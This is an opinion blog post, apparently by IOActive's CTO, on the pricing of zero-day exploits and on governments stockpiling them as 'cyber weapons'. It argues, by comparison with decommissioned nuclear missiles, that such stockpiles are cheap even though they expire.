The answer in the majority of cases tends to be “it depends on who’s buying and what the vulnerability is” regardless of the questions particular phrasing.

On the topic of exploit development, last month I wrote an article for DarkReading covering the business of commercial exploit development, and in that article you’ll probably note that I didn’t discuss the prices of what the exploits are retailing for. That’s because of my elusive answer above… I know of some researchers with their own private repository of zero-day remote exploits for popular operating systems seeking $250,000 per exploit, and I’ve overheard hushed bar conversations that certain US government agencies will beat any foreign bid by four-times the value.

But that’s only the thin-edge of the wedge. The bulk of zero-day (or nearly zero-day) exploit purchases are for popular consumer-level applications – many of which are region-specific. For example, a reliable exploit against Tencent QQ (the most popular instant messenger program in China) may be more valuable than an exploit in Windows 8 to certain US, Taiwanese, Japanese, etc. clandestine government agencies.

More recently some of the conversations about exploit sales and purchases by government agencies have focused in upon the cyberwar angle – in particular, that some governments are trying to build a “cyber weapon” cache and that unlike kinetic weapons these could expire at any time, and that it’s all a waste of effort and resources.

I must admit, up until a month ago I was leaning a little towards that same opinion. My perspective was that it’s a lot of money to be spending for something that’ll most likely be sitting on the shelf that will expire in to uselessness before it could be used. And then I happened to visit the National Museum of Nuclear Science & History on a business trip to Albuquerque.

Museum: Polaris Missile

 

Museum: Minuteman missile part?

For those of you that have never heard of the place, it’s a museum that plots out the history of the nuclear age and the evolution of nuclear weapon technology (and I encourage you to visit!).

Anyhow, as I literally strolled from one (decommissioned) nuclear missile to another – each laying on its side rusting and corroding away, having never been used, it finally hit me – governments have been doing the same thing for the longest time, and cyber weapons really are no different!

Perhaps it’s the physical realization of “it’s better to have it and not need it, than to need it and not have it”, but as you trace the billions (if not trillions) of dollars that have been spent by the US government over the years developing each new nuclear weapon delivery platform, deploying it, manning it, eventually decommissioning it, and replacing it with a new and more efficient system… well, it makes sense and (frankly) it’s laughable how little money is actually being spent in the cyber-attack realm.

So what if those zero-day exploits purchased for measly 6-figured wads of cash curdle like last month’s milk? That price wouldn’t even cover the cost of painting the inside of a decommissioned missile silo.

No, the reality of the situation is that governments are getting a bargain when it comes to constructing and filling their cyber weapon caches. And, more to the point, the expiry of those zero-day exploits is a well understood aspect of managing an arsenal – conventional or otherwise.

— Gunter Ollmann, CTO – IOActive, Inc.